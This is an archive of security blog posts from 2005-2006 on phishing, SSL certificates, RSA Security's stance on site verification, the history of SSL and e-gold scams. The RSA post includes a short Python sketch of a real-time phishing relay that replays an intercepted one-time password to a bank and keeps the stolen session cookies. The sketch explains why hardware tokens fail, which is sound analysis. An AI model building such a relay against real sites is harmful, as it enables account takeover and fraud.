    Cyber-crime is real crime, only using the net. Cyber-terrorism will be here one day. If we can’t handle what we have on our plate today or worse, think we are OK, how will we handle it when it is here?

    Posted by iang at 08:03 AM | Comments (2) | TrackBack

    February 14, 2006

    Todd Boyle: value of transactions versus security model

    Todd Critiques! iang wrote:

    > Financial Cryptography Update: Brand matters (IE7, Skype, Vonage, Mozilla)
    > [........]
    > No, brand is a shorthand, a simple visual symbol that points to the
    > entire underlying security model. Conventional bricks&mortar
    > establishments use a combination of physical and legal methods
    > (holograms and police) to protect that symbol, but what Trustbar has
    > shown is that it is possible to use cryptography to protect and display
    > the symbol with strength, and thus for users to rely on a simple visual
    > icon to know where they are.

    >
    > Hopefully, in a couple of years from now, we'll see more advanced, more
    > thoughtful, more subtle comments like "the secured CA brand display
    > forms an integral part of the security chain. Walking along this
    > secured path - from customer to brand to CA to site - users can be
    > assured that no false certs have tricked the browser."


    The statement above seems incorrect to me, and inconsistent with statements you have made for many years.

    Any security that works on ordinary general purpose computers is going to work only as long as one of the following holds: no high value transactions at stake, no large numbers of users, and/or not in the marketplace very long.

    In other words, any mac or windows or linux thing that gets into common use by very many people, that actually has any money at stake, will be cracked before very long. There is some type of a destruction curve that starts out slow, then reaches a steep slope or catastrophic collapse, again depending on how much money is at stake, aggregated over the number of users.

    I'm afraid this will be true until there are two elements introduced: more people, real people in the community, involved in the day-to-day operation of our identity and reputation mechanisms, and, a signing device that is guaranteed to perform its function for the long term and I don't mean 99.999% but 100%. However humble its function, to be adopted at all, it must be 100% even if that's artificially nailed down by some sort of intermediary, some sort of insurance as we see with credit cards. Why is this taking so long to appear?!

    In closing, we had Bruce Schneier in Seattle last weekend,

    Todd


    Sunday, February 12, 2006 - Page updated at 12:00 AM
    500 show up to hear security guru
    By Tan Vinh
    Seattle Times staff reporter

    Bruce Schneier once worked for the Defense Department.

    Since the disclosure last month that the government authorizes warrantless domestic spying, the water-cooler chats and classroom debates have raged over privacy and constitutional rights.

    But Bruce Schneier, the security guru who has rock-star status among crypto-philes, offered another take on the matter to a crowd of more than 500 people at the American Civil Liberties Union convention at the University of Washington on Saturday: This computer-eavesdropping stuff doesn't really work.

    "When you have computers in charge telling people what to do, you have bad security," said Schneier, who worked for the U.S. Department of Defense in the 1980s.

    Schneier, who won't reveal what he did for the Defense Department other than to say it's related to communications and security, said the domestic-eavesdropping program relies on computers to pick up words such as "bomb," "kill" or "president" in conversations and flag the participating parties as potential suspects.

    Last month, the Bush administration acknowledged authorizing the National Security Agency to intercept e-mails and phone calls without warrants in cases where one party is outside the United States.

    "Technology is static," Schneier said. "It doesn't adapt. But people can adapt to whatever is going on," he said. "You are better off" hiring more FBI agents to gather intelligence.

    The security is not worth the cost because the computers generate too many false alarms, Schneier said.

    "Replacing people with technology hardly ever works."

    With his thinning hair in a ponytail, Schneier looked more like a hippie than a cryptography expert whose books have gained cult status and whose appearances draw standing-room-only crowds.

    Here to speak about the nation's concern with security since the Sept. 11, 2001, attacks, the 43-year old Minneapolis resident suggested everyone step back and realize "terrorist attacks are rare. They hardly ever happen."

    A funny thing happens when people get scared, he said. People give up their freedom or liberties to authority. And politicians create "movie plots" of attacks at maybe the Super Bowl or the New York subways, as if terrorists couldn't attack another event or the subway stations in Boston, he said.

    "Security that requires us to guess right" is not worth the cost because there are too many potential targets, he said.

    Tan Vinh: 206-515-5656 or tvinh@seattletimes.com

    Posted by iang at 12:19 PM | Comments (1) | TrackBack

    SSL phishing, Microsoft moves to brand, and nyms

    fm points to Brian Krebs who documents an SSL-protected phishing attack. The cert was issued by Geotrust:

    Now here's where it gets really interesting. The phishing site, which is still up at the time of this writing, is protected by a Secure Sockets Layer (SSL) encryption certificate issued by a division of the credit reporting bureau Equifax that is now part of a company called Geotrust. SSL is a technology designed to ensure that sensitive information transmitted online cannot be read by a third-party who may have access to the data stream while it is being transmitted. All legitimate banking sites use them, but it's pretty rare to see them on fraudulent sites.

    (skipping details of certificate manufacturing...)

    Once a user is on the site, he can view more information about the site's security and authenticity by clicking on the padlock located in the browser's address field. Doing so, I was able to see that the certificate was issued by Equifax Secure Global eBusiness CA-1. The certificate also contains a link to a page displaying a "ChoicePoint Unique Identifier" for more information on the issuee, which confirms that this certificate was issued to a company called Mountain America that is based in Salt Lake City (where the real Mountain America credit union is based.)

    The site itself was closed down pretty quickly. For added spice beyond the normal, it also had a ChoicePoint Unique Identifier in it! Over on SANS - something called the Internet Storm Center - a Handler investigates why malware became a problem and chooses phishing. He has the Choicepoint story nailed:

    I asked about the ChoicePoint information and whether it was used as verification and was surprised to learn that ChoicePoint wasn't a "source" of data for the transaction, but rather was a "recipient" of data from Equifax/GeoTrust. According to Equifax/GeoTrust, "as part of the provisioning process with QuickSSL, your business will be registered with ChoicePoint, the nation's leading provider of identification and credential verification services."

    LOL... So now we know that the idea is to get everyone to believe in trusting trust and then sell them oodles of it. Quietly forgetting that the service was supposed to be about a little something called verification, something that can happen when there is no reason to defend the brand to the public.

    Who would'a thunk it? In other news, I attended an informal briefing on Microsoft's internal security agenda recently. The encouraging news is that they are moving to put logos on the chrome of the browser, negotiate with CAs to get the logos into the certificates, and move the user into the cycle of security. Basically, Trustbar, into IE. Making the brand work. Solving the MITM in browsers.

    There are lots of indicators that Microsoft is thinking about where to go. Their marketing department is moving to deflect attention with 10 Immutable Laws of Security:

    Law #1: If a bad guy can persuade you to run his program on your computer, it's not your computer anymore
    Law #2: If a bad guy can alter the operating system on your computer, it's not your computer anymore
    Law #3: If a bad guy has unrestricted physical access to your computer, it's not your computer anymore
    Law #4: If you allow a bad guy to upload programs to your website, it's not your website any more
    Law #5: Weak passwords trump strong security
    Law #6: A computer is only as secure as the administrator is trustworthy
    Law #7: Encrypted data is only as secure as the decryption key
    Law #8: An out of date virus scanner is only marginally better than no virus scanner at all
    Law #9: Absolute anonymity isn't practical, in real life or on the Web
    Law #10: Technology is not a panacea

    Immutable! I like that confidence, and so do the attackers. #9 is worth reading - as Microsoft are thinking very hard about identity these days. Now, on the surface, they may be thinking that if they can crack this nut about identity then they'll have a wonderful market ahead. But under the covers they are moving towards that which #9 conveniently leaves out - the identity is the key - and it's called pseudonymity, not anonymity. Rumour has it that Microsoft's Windows operating system is moving over to a pseudonymous base but there is little written about it.

    There was lots of other good news, too, but it was an informal briefing, so I informally didn't recall all of it. Personally, to me, this means my battle against phishing is drawing to a close - others far better financed and more powerful are carrying on the charge. Which is good because there is no shortage of battles in the future.

    To close, deliciously, from Brian (who now looks like he's been slashdotted):

    I put a call in to the Geotrust folks. Ironically, a customer service representative said most of the company's managers are presently attending a security conference in Northern California put on by RSA Security, the company that pretty much wrote the book on SSL security and whose encryption algorithms power the whole process. When I hear back from Geotrust, I'll update this post.

    That's the company that also recently ditched SSL as a browsing security method. At least they've still got the conference business.

    Posted by iang at 06:21 AM | Comments (1) | TrackBack

    January 07, 2006

    RSA comes clean: MITM on the rise, Hardware Tokens don't cut it, Certificate Model to be Replaced!

    In a 2005 document entitled Trends and Attitudes in Information Security that someone sent to me, RSA Security, perhaps the major company in the security world today, surveys users in 4 of the largest markets and finds that most know about identity theft, and most are somewhat scared of ecommerce today. (But growth continues, so it is not all doom and gloom.)

    This is an important document so I'll walk through it, and I hope you can bear with me until we get to the important part. As we all know all about identity theft, we can skip to the end of that part. RSA concludes its longish discussion on identity theft with this gem:

    Conclusion

    Consumers are, in many respects, their own worst enemies. Constantly opening new accounts and providing personal information puts them at risk. Ally this to the naturally trusting nature of people and it is easy to see why Man-in-the-middle attacks are becoming increasingly prevalent. The next section of this e-Book takes a closer look at these attacks and considers how authentication tokens can be a significant preventative.

    Don't forget to blame the users! Leaving that aside, we now know that MITM is the threat of choice for discerning security companies, and it's on the rise. I thought that last sentence above was predicting a routine advertisement for RSA tokens, which famously do not cover the dynamic or live MITM. But I was wrong, as we head into what amounts to an analysis of the MITM:

    9. Offline [sic] Man-in-the-Middle attack

    With online phishing, the victim receives the bogus e-mail and clicks through to the falsified Web site. However, instead of merely collecting rapidly changing passwords and contact information, the attacker now inserts himself in the middle of an online transaction stream. The attacker asks for and intercepts the user’s short-time-window, onetime password and stealthily initiates a session with the legitimate site, posing as the victim and using the victim’s just-intercepted ID and OTP.

    Phishing is the MITM. More importantly, the hardware tokens that are the current rage will not stop the realtime attack, that which RSA calls "online phishing." That's a significant admission, as the RSA tokens have a lot to do with their current success (read: stock price). The document does not mention the RSA product by name, but that's an understandable omission.
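
    (To spell out why the token doesn't help against the online variant: the attack is a plain relay. A minimal sketch, with made-up names, and any HTTP client standing in - the only point is that the just-typed code gets replayed inside its validity window:)

        import requests  # any HTTP client would do

        REAL_SITE = "https://bank.example/login"  # hypothetical real endpoint

        def handle_victim_post(form: dict):
            """Called when the victim submits the spoofed login form."""
            session = requests.Session()
            # The one-time password is still inside its short validity
            # window, so replaying it immediately succeeds - the token
            # has authenticated the attacker's session, not the victim's.
            session.post(REAL_SITE, data={
                "user": form["user"],
                "otp": form["otp"],  # the just-intercepted one-time code
            })
            return session.cookies  # an authenticated session, stolen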

    Understandable or not - your pick. But let's get back to reading this blurb. Here comes the important part! Heads up!

    The need for site verification

    The proper course is for the computer industry to create a comprehensive method and infrastructure for site verification—mutual authentication by both site host and user. Most authentication is about knowing who the user is—but the user wants the same level of assurance that he’s dealing with the right/trusted site. Site verification creates a two-way authentication process. Different security advocates have proposed a couple of alternatives to achieve site verification.

    Host Authentication
    In this method, the legitimate site host presents a value onscreen. The user must compare that value to what’s displayed on the token and ensure it matches....

    Read it again. And again, below, so you don't think I make this shit up. RSA Security is saying we need a site verification system, and not mentioning the one that's already there!

    SSL and certificates and the secure browsing system are now persona non grata, never to be mentioned again in corporate documents. The history book of security is being rewritten to remove reference to a decade or so of Internet lore and culture. Last time such a breathtaking revision occurred was when Pope Gregory XIII deleted 10 days from the calendar and caused riots in the streets by people wanting their birthdays back. (Speaking of which, did anyone see the extra second in the new year? I missed it, darn it. What was it like?)

    So, what now? I have my qualms about a company that sells a solution in one decade, makes out like bandits, and then gets stuck into the next decade selling another solution for the same problem. I wrote recently about how one can trust a security project more when it admits a mistake than when it covers it up or denies its existence.

    But one's trust or otherwise of RSA Security's motives or security wisdom is not at issue, except for those stock price analysts who hadn't figured it out before now. The important issue here for the Internet community is that when RSA admits, by default or by revisionism, that the certificates in the secure browsing model need to be replaced, that's big news.

    This is another blackbird moment. RSA wrote the rule book when it came to PKI and certificates. They were right in the thick of the great ecommerce wars of 1994-1995. And now, they are effectively withdrawing from that market. Why? It's had a decade to prove itself and hasn't. Simple. Some time soon, the rest of the world will actually admit it too, so better be ahead of the curve, one supposes.

    Get the message out - RSA has dumped the cert. We still have to live with it, though, so there is still lots of work to be done. Hundreds of companies are out there pushing certificates. Thousands of developers believe that these things work as is! A half-billion or so browsers carry the code base.

    Without wishing to undermine the importance of RSA Security's switch in strategy, they do go too far. All that certificate code base can now be re-factored and re-used for newer, more effective security models. I'll leave you with this quasi-recognition that RSA is searching for that safe answer. They're looking right at it, but not seeing it, yet.

    Browser plug-in

    With this method, a locally resident browser plug-in cryptographically binds the one-time password (or challenge-response) to the legitimate site—i.e., the actual URL, rather than the claimed site name. This means that the password is good only for the legitimate site being visited.
    This is an implicit level of site verification and is a far better approach than token-based host authentication and can prevent man-in-the-middle attacks. There are drawbacks and vulnerabilities, however. First, a browser plug-in presents all of the attendant issues of client software: it must be successfully loaded by the customer and updated, supported, and maintained by the site host. And, if the PC has been compromised through some form of co-resident malware, it remains vulnerable to subsequent exploitation.

    Huh. So what they are saying is "we see good work done in plugins. But we don't see how we can help?" Well, maybe. I'd suggest RSA Security could actually do good work by picking up something like Trustbar and re-branding it. As Trustbar has already reworked the certificate model to address phishing, this provides the comfortable compromise that RSA Security needs to avoid the really hard questions. Strategically, it has everything a security company could ever want, especially one cornered by its past.
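
    (The binding idea itself is simple enough to sketch. This assumes an HMAC construction, which the document doesn't specify - the point is only that a code computed for one URL is worthless at any other:)

        import hashlib, hmac

        def site_bound_otp(otp_secret: bytes, url: str) -> str:
            """Mix the actual URL into the one-time code before it leaves
            the machine, so a code entered at a phishing URL cannot be
            relayed to the real site."""
            mac = hmac.new(otp_secret, url.encode(), hashlib.sha256)
            return mac.hexdigest()[:8]

        # The real site checks site_bound_otp(secret, "https://bank.example/");
        # the phisher's relay only ever sees the code bound to its own URL.

    Which, note, is exactly the property the plain hardware token lacks.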

    I said that was the last, but I can't resist one more snippet. Notice who else is dropped from the lexicon:

    In the end, trust is a human affair and the right technology foundations can create a much stronger basis for forming that trusted relationship. As consumers and vendors continue to respond to new and emerging threats to identity theft, it will be essential for them to bear these principles in mind. For more information about any of the issues raised in this document please visit www.rsasecurity.com or contact:

    If anyone can send me the URL for this document I'll gladly post it. All in all, thanks to RSA Security for coming clean. Better late than never! Now we can get to work.

    Posted by iang at 03:45 PM | Comments (10) | TrackBack

    January 01, 2006

    13 reasons why security is not a "Requirement"

    Jeremy Epstein asked someone why they didn't ask "is it secure?" in the evaluation of a security product. This someone, a government procurer, had no answer other than surprise! Why is this, more generally, Epstein asks? Here's his list:

    1. People assume the vendor takes care of it.
    2. They don't know that they should ask.
    3. They don't know what to ask for.
    4. They're uncomfortable with the technology.
    5. They've made a conscious risk assessment.
    6. They think they're safe.
    7. They use vulnerability metrics.
    8. They simply don't believe vendor claims are trustworthy.
    9. They have reduced security requirements in the POC.
    10. They don't think it's their job.
    11. They know that their organization doesn't care.
    12. They think standards take care of the problem.
    13. They perform their own testing.


    Check the main article for his reasoning on all of these questions. It is encouraging to hear such open questioning of the security world; readers here will know that I advance the Hypotheses that neither vendor nor purchaser know whether a product is "secure". See 8 and 3 above, in that order.

    One quibble. In asking "why not," we do enter a troublesome area, scientifically speaking. There are always a hundred reasons not to do something, but figuring out which are the real factors and which are the rationalisations is hard. Generally, we as people do better at answering why we actively do something in the positive sense than why we don't.

    If the question had been placed in the context of requirements ("why are you buying a security product") and results ("did the one you purchased meet your requirements"), then more sense might have come out of it. Which is to say that not all security requirements should be viewed through the narrow lens of security, but perhaps through the wider lens of procurement.

    Quibbles aside, an encouraging development.

    Posted by iang at 02:38 PM | Comments (0) | TrackBack

    December 30, 2005

    GP4.3 - Growth and Fraud - Case #3 - Phishing

    We would be remiss if we didn't also measure the theory of GP (GP1, GP2, GP3) against that old hobby horse, phishing.

    When ecommerce burst on the scene as an adjunct to browsing, it pretty quickly emerged as "taking credit card orders over the net." This took off fairly easily as the FORM in HTML allowed ready collection of these data, and many existing credit card merchants simply shipped as if the new orders were MOTO - mail-order/telephone-order ones.

    There were a few niggles around though. Security was thought to be a bit loose, as all these credit cards were flashing around on the open net. Compare this to the existing usage where credit cards were handed over to waiters and waitresses for copying back at the counter, or where orders taken over telephone resulted in goods generally being shipped to billing addresses, and it was either scary or not scary, depending on how closely you really understood the cycle. Nobody ever showed that credit cards were being snooped on the net, although telnet passwords were being scarfed up in large numbers (a threat that led separately to the development of hyper-successful SSH) so we can see here the seeds of a GP-problem.

    Obviously a little crypto would have helped, and SSL in its first version ("v1") was duly floated to the crypto community sometime in 1994. All things being equal, this would have been acceptable to deal with the potential of fraud, but not all things were equal. In fact, so many things were not equal that this minor case has become what amounts to a major history lesson.

    In order to understand SSL it is necessary then to digress and understand the environment of the times. I present this as forces, a sort of institutional approach from economics (cf. Michael Porter's Five Forces analysis). Here's the list of forces that were pushing around in 1994:

    1. Netscape's stellar growth, capped by the dotcom fairy story of their IPO, had put Netscape firmly in the driver's seat of ecommerce. Unfortunately, they couldn't sell their flagship product because they had set a price tag of $50 for the browser but nicely left it free for personal use or somesuch. (As events were to show, Microsoft simply boxed them in by shipping their browser for free. Only Microsoft could afford to win that battle.) Force: Netscape needed big friends, big products, big revenues and something to spend its IPO cash on. Result: the pressure was on the ecommerce division to save Netscape's bacon.
    2. Porn! Insiders report that fully half of early SSL use was by adult sites which needed to reduce the risks of delivering the product to the wrong party. Paying for certs or secured servers was chicken feed compared to being shown to deliver to the wrong "customer." However, what they didn't want was the load that ground their servers into the dust - megabyte images being far different animals to kilobyte credit card transfers. Hence, cue in some early hard engineering questions: load balancing, page caching, proxy servers, page pre-loading from customers whose interest in security was unusual and unpredicted.
    3. Fear and Loathing and the Payments Industry. The credit card companies were scared witless by the arisal of new payment companies like First Virtual (a sort of forerunner to PayPal) and before them, DigiCash, and lobbied to anyone who would listen to get some 'protection' for ecommerce. One idea that they liked was the certificate, that some had mused on as being the "missing link" in the security of SSL. Better yet, those that controlled lots of merchants (MCI and AT&T in this case) could envisage delivering the certificates to the merchants, and leaving the outsiders to fend for themselves; in other words, a classic barrier to entry. But it also appealed to Netscape because pushing certificates not only boosted sales of their secure server, it maintained their control over the protocol and found them some great new friends. Briefly.
    4. The crypto wars! The protagonists were the United States government in the person of Louis Freeh on the one hand and the network libertarians on the other. Although the USG was prepared to compromise on weak crypto which would have been fine for ecommerce, this wasn't good enough for the cypherpunks. Nothing short of complete freedom to implement super-strong crypto against any threat for any application was acceptable. As a side-effect to their religious war against "national technical means," any merchant who implemented anything short of 100% absolutely secure no risk guaranteed and certified crypto was hit by the indiscriminate pogrom of the free crypto crowd; the result of this "all or nothing" security approach was more often nothing than all.
    5. Hence another short footnote in the history of ecommerce arrived in the form of SSL being required to run at full crypto strength against the man who wasn't in the middle and against Eve who wasn't listening. Unfortunately, the machines of the time were not strong enough to push through sessions fast enough. Inevitably, as nothing short of full strength was adequate, and certs and triple DES were dimming the lights of ecommerceville by about 80-90%, the security space again split into SSL-mode for collecting credit cards and non-SSL mode for the rest. This made security itself inordinately difficult, as in classical military terms, there was now a gap between security models through which to attack, and security itself was now firewalled off from the main shopping process.
    6. The US Department of Defense's "COTS" dream. In the 90s, the DoD procurement monolith took on a new mission. In brief, they decided to offset their R&D costs onto general society, and move to purchasing commercial off-the-shelf equipment, albeit directed towards government needs. The unwritten offer given to suppliers like Netscape was to sell DoD standard COTS software, split off portions of the revenue stream at appropriate points to fund government-specific development, and then sell DoD "COTS" with additional new "GOTS" features. Recalling that the US government was the single largest source of Netscape revenues, this was no small offer!
    7. The NSA's PKI dream. The American spook community decided to bet the farm on PKI as a way to slip into place a crypto regime dependent on a pre-rigged infrastructure. In perhaps following the COTS dream of their peers over at DoD, NSA pushed procurement into the direction of requiring and acquiring large PKI structures and they pushed certain suppliers - you know who I mean - into valuable PKI nodes and roles so as to make sure the(ir) infrastructure was in place. The theory was that this would then explode into life, we'd all "get PKI" religiously and then find ourselves hooked.
    8. The DoJ's non-repudiation dream. Some legal people (and not a few techies) believed that a digital signature was in some ways analogous to a human signature. They reasoned that if they could get the non-repudiation aspects slipped into the Internet, they'd be able to control and prosecute the criminals to come. This meant laws, structure, authorities, and above all, control.
    9. Identity Solves Every Security Problem. Once people realised that the certificate was like an identity, business plans bloomed like a thousand flowers based on the right to sell these identities back to their owners. Billion dollar cash flows based on the ability to sell a $100 cert to 100 million Americans floated around Wall Street. We say in (real) warfare that no plan of battle survives the first shot, etc etc, and in relatively short order, the certificate authority space was turned upside down by competitors diving in and demanding access. Netscape lost control of the space, and made all CAs equivalent so it wasn't seen to favour anyone. Inevitably, this reduced the security of the system to where certificates acquired popup-avoidance status, because there was no differentiation and certificates became a bottom-feeding business.
    10. The patent wars! RSADSI and Cylink were engaged in battle over public key crypto standards. Also sparring was NIST with DSA and that Canadian company with EC. Ultimately won by RSA, this also saw a whole bunch of weird and wonderful licensing agreements forced on customers. No points for guessing what features were withheld in the licences offered to which customers!


    fig 8. the Battle for Ecommerce

    Heady stuff for conspiracy theorists! Now, the beauty of the above forces is that they don't all have to be true, even though I believe them to be fair if one-sided representations. Enough of these forces still sum to a relevant picture. We can reach the conclusions we need, so let's go there right now.

    In the face of all these pressures, Netscape found itself adding certificate-based protection with a new upgraded form of SSL called v2. (Even SSL v2 was a little loose, so they quickly hired an external consultant to come in and do v3, although that form of SSL still hasn't properly deployed in your default secure sessions as yet, so it must have been OK to secure ecommerce with v2!)

    The end result was the balkanisation of the Internet's security space. Various large and famous companies carved up the space amongst them and created the CA structure that we know today. Certificates went from full-PKI-wholesome-trust mode to popup-avoidance certificate manufacturing mode in the blink of a venture capitalist's eye. Verisign made out like bandits on the stock market. The USG chipped in with some worry about enemies of the state, and forced a mishmash of cipher suites and options and above all, the certificates that a dozen agencies put so much store by. The cypherpunks added their "all or nothing" politics to the mix and created the "all and nothing" nightmare. Netscape themselves were soon embroiled in a bid for survival as Microsoft defeated them on their own ground and went on to all but own ecommerce space. And out in ecommerceville itself, they ruined the security by breaking the model down the center.

    So what was all that about, in summary form? SSL v1 was put in place for a predicted, but so far unvalidated threat. The lack of focus on a clear validated threat left the space vulnerable to capture - and SSL v2 duly became the battle ground of many, none of whom had much concern about security of the browser users' sessions but were quite willing to use it as a casus belli in the war against someone or other.

    The question that I often pondered on was why certificates were added to SSL. From a technical pov, they are too expensive for the mission, too heavy. Now that I've investigated the forces and listed them out, I can see the error of my ways - obviously this had nothing to do with security, and the question is best off couched as "how could Netscape have possibly avoided putting a certificate-based PKI into the security protocol?" And that's the conclusion we need: there is no way they could have avoided it. The forces were just too strong.

    Back to security. A little-known small-time fraud turned up with the name of phishing. Originally, this was a very crude and old claims scam on AOL, where the A.O.Lusers were sold some bogus product and had their credit cards re-used elsewhere. By the time AOL had been all phished out, the model was well understood and well tested, so it was natural to start somewhere else.


    fig 9. the Battle of Online Banking

    Fast forward to the new millennium, and that somewhere else was online payment systems and banks. I.e., where the money is. The first known phishing attack on a financial operator was June 2001 against e-gold. Delivered using spam techniques, users were tricked into entering their passwords into near-enough websites. And it was here that the browser security model was first challenged, and failed within moments. The one thing that the certificate was supposed to do was tell the user that they were on the right site, plus or minus some details. But by the time the attackers arrived, the security model had been so abused by other agendas that it wasn't capable of putting up a fight against a real criminal.

    Worse, the huge infrastructure that had been built up - crypto libraries, protocol libraries, browser manufacturers, web server manufacturers, standards committees, certificate authorities, auditors, audit standards models, digital signature laws, PKI rollouts and a cast of a thousand onlookers - proved itself simply incapable of accepting the threat for what it was - a successful attack on the browser's security model.

    We're still there - working with a security model that was envisaged as a nice quick and dirty fix for credit cards in the first instance, in the second instance squabbled over by a bunch of disparate interests, and in the third instance broken like a child's toy sword the day after Christmas when the first bully turned up and whacked it with a stick. Worse, in the fourth instance, phishing has invested its proceeds and diversified into the trojan / malware and data breach spaces, so any fixes delivered are not going to stem the tide of red ink losses.

    It might be hard to tell when GP was reached in ecommerce. But the real underlying conclusion to draw from this case is this: do not put the security model in place too early! In the case of phishing, by the time the model was needed, it was incapable of protecting against the threat, and of adjusting to it. The cost of this impatience can be measured by integrating the red curve in fig. 9 - it's all the area under the curve.


    This case study concludes the story of Growth and Fraud.

    Posted by iang at 07:51 PM | Comments (17) | TrackBack

    Netcraft - 450 phishing cases using SSL / HTTPS certs

    Lynn points to techworld that points to NetCraft that states it has confirmed 450 HTTPS phishing attacks:

    In its first year, the Netcraft Toolbar Community has identified more than 450 confirmed phishing URLs using "https" urls to present a secure connection using the Secure Sockets Layer (SSL). The number of phishing attacks using SSL is significant for several reasons. Anti-phishing education initiatives have often urged Internet users to look for the SSL "golden lock" as an indicator of a site's legitimacy. Although phishers have been using SSL in attacks for more than a year, the trend seems to have drawn relatively little notice from users and the technology press.

    Case in point: The use of SSL certificates in phishing scams made headlines in September when a security vendor issued a press release warning of a scam in which a spoofed phishing site used a self-signed certificate, presenting a gold lock icon but also triggering a browser warning that the certificate was not recognized. In this case, the phishers were banking on the likelihood that many users will trust the padlock and ignore the certificate warning. Despite the attention, the attack wasn't particularly new or novel.

    The Netcraft Toolbar community has identified many similar phishing attacks in which spoof sites use a certificate that can be expected to trigger a browser warning, in hopes that some victims will view the "Do you want to proceed?" pop-up and simply click "Yes." Numerous scams have used a hosting company's generic shared server SSL certificate with a spoof site housed on a "sound-alike" URL lacking its own certificate.

    The beauty of the golden lock icon has been that it simplified complex security concepts into a single symbol that non-technical users could understand and trust. Phishing scams designed to prompt security warnings raise the stakes, requiring users to understand what the browser warning is telling them, and how they should respond. Upcoming SSL-related interface changes in Internet Explorer 7 and other browser updates make a good start toward providing users with clearer information. But as we noted earlier this year, many banks are shifting their online banking logins to the unencrypted home pages of their websites, further muddling the issue of training customers to trust only SSL-enabled sites. The non-SSL presentation of these bank logins is already being incorporated into spoof pages.

    Interesting point - this came from their Toolbar community - a design I've frequently criticised! I'm still in search of the Perfect Phish by the end of the year, so as to meet my quota in predictions.

    Also see The Year in Phishing

    Posted by iang at 02:18 PM | Comments (0) | TrackBack

    December 26, 2005

    GP4.2 - Growth and Fraud - Case #2 - e-gold

    e-gold rocketed to success in late 1999 in a classical exponential growth curve that took everyone by surprise. Why the mathematics of growth continue to shock and awe has never been explained to me, but when you've just taken a technically bankrupt firm to a paper value of half a bill inside a year, such academic trivia has little import.

    For all that, at one point on the curve, from the second half of 1999 to the first half of 2000, the e-gold payment system experienced in rapid succession:

    • rapidly growing exchange orders,
    • the first independent exchanger, albeit small and unwelcome, but followed by dozens more
    • a small group of vendors of supporting software services
    • a casino and a lottery game
    • investment from J.W.Zidar, later revealed as the owner/operator of a $72 million scam
    • bootstrap super-issues over the top of e-gold
    • a rash of fraudulent transactions from mainstream American online banks with swiss cheese ACH interfaces, and
    • a rampage of scams!

    Not necessarily in clear and concise order, and it should be recognised that those were turbulent, exciting and stressful times!

    The arisal of scams on e-gold bears studying. The first one identified was called Advance, and it was a classic Ponzi scheme. In this model, new members join, advancing funds for investment, but the supposed investments are used to pay off old investors. As long as new investors come in, older investors could be paid off, and could then perpetuate the myth of great returns. Sooner or later the music stops, though, and then the scam falls apart.
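
    (The arithmetic of when the music stops is worth a sketch. With made-up numbers: each round, new deposits must cover the returns promised on everything already in, so once recruitment grows slower than the promised rate, collapse is only a matter of time:)

        def ponzi_collapse(promised_rate=0.10, recruit_growth=0.08):
            """Return the round at which new money no longer covers payouts."""
            invested, new_money = 0.0, 100.0
            for r in range(1, 100):
                invested += new_money              # this round's deposits go in
                owed = invested * promised_rate    # returns now due each round
                new_money *= 1 + recruit_growth    # the next wave of recruits
                if new_money < owed:
                    return r                       # the music stops here
            return None

        print(ponzi_collapse())  # 21 - growth at 8% cannot service 10% forever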


    fig 7. e-gold hits the GP point 1999 Q3

    There is some definitional discussion due around whether the scams that hit e-gold were attacks on the system or the members, and much debate as to whether it is e-gold's responsibility to treat it or not. But for the present purposes, the result is clear: e-gold was worth stealing and thus GP was achieved. The security of the system (bog-standard SSL) was, during the time of interest, adequate to the task of stopping hackers from stealing directly; so fraudsters simply moved to stealing from each other.

    Even as Advance was being unwound by e-gold, there were others in the pipeline. It is salutary that e-gold and other digital gold issuers took substantial and diverging steps to avoid the fate of scams. In contrast, the mutual funds industry hunkered down for a year or two ($3,000,000,000 in fines or so hardly scratched the surface), and now the signs are that it's business as usual - get your late orders in as slowly as you like! That's the difference between open governance and regulatory fiat, but that's the topic of other rants.

    And finally, that old favourite: Phishing.

    Posted by iang at 07:57 PM | Comments (2) | TrackBack

    December 24, 2005

    A new security metric?

    I have a sort of draft paper on security metrics - things which I observe are positive in security projects. The idea is that I should be able to identify security projects, on the one hand, and on the other provide some useful tips on how to think past the press release. Another metric just leaped out and bit me from that same interview with Damien Miller:

    Why did you increase the default size of new RSA/DSA keys generated by ssh-keygen from 1024 to 2048 bits?

    Damien Miller: Firstly, increasing the default size of DSA keys was a mistake (my mistake, corrected in the next release) because unmodified DSA is limited by a 160-bit subgroup and SHA-1 hash, obviating most of the benefit of using a larger overall key length, and because we don't accept modified DSA variants with this restriction removed. There are some new DSA standards on the way that use larger subgroups and longer hashes, which we could use once they are standardized and included in OpenSSL.

    We increased the default RSA keysize because of recommendations by the NESSIE project and others to use RSA keys of at least 1536 bits in length. Because host and user keys generated now will likely be in use for several years we picked a longer and more conservative key length. Also, 2048 is a nice round (binary) number.

    Spot it?

    Here it is again in bold:

    Damien Miller: Firstly, increasing the default size of DSA keys was a mistake (my mistake, corrected in the next release) because [some crypto blah blah]

    A mistake! Admitted in public! Without even a sense of embarrassment! If that's not a sign that the security is more important than the perception then I don't know what is...

    Still not convinced? When was the last time you ever heard anyone on the (opposing) PKI side admit a mistake?
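
    (For completeness, the arithmetic behind the admission is short. A sketch using the usual rough symmetric-equivalent estimates - the numbers are the standard ones, not anything from the interview:)

        def dsa_strength(modulus_bits: int, subgroup_bits: int, hash_bits: int) -> int:
            """DSA's effective strength is capped by the weakest of modulus,
            subgroup and hash - so a bigger modulus alone buys nothing."""
            # rough symmetric-equivalent strength of the modulus discrete log
            modulus_strength = {1024: 80, 2048: 112, 3072: 128}[modulus_bits]
            # Pollard rho on the subgroup, and collisions on the hash,
            # each cost about half their bit length
            return min(modulus_strength, subgroup_bits // 2, hash_bits // 2)

        print(dsa_strength(1024, 160, 160))  # 80
        print(dsa_strength(2048, 160, 160))  # still 80: subgroup and SHA-1 cap it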

    Posted by iang at 08:55 AM | Comments (9) | TrackBack

    December 14, 2005

    2005 in review - The Year I lost my Identity

    In the closing weeks of 2005, we can now look back and see how the Snail slithered its way across the landscape.

    1. Banks failed to understand phishing at any deep level. They failed in these ways:

    • Pushing out websites that offered login boxes on unencrypted pages opened the door to phishing attacks and got the banks onto Amir's Hall of Shame.
    • Rollout of two-factor authentication tokens -- a.k.a. SecureIds as promoted by RSADSI, as ordered by the FDIC, and as jumped on by the banks desperate to be seen to do something -- devices which only address one easily 'fixed' issue in phishing: realtime access. Yet, even as the bandwaggon was exceeding the speed limit, we already saw the first realtime attacks. I predicted that we'll see the first fully perfect attacks by the end of the year.
    • Banks experienced a wave of chill when Lopez sued Bank of America. Although they knew that they were in the right, they also knew this case would probably be lost. Or, at least, it was the beginning of the end of the easy risk separation.

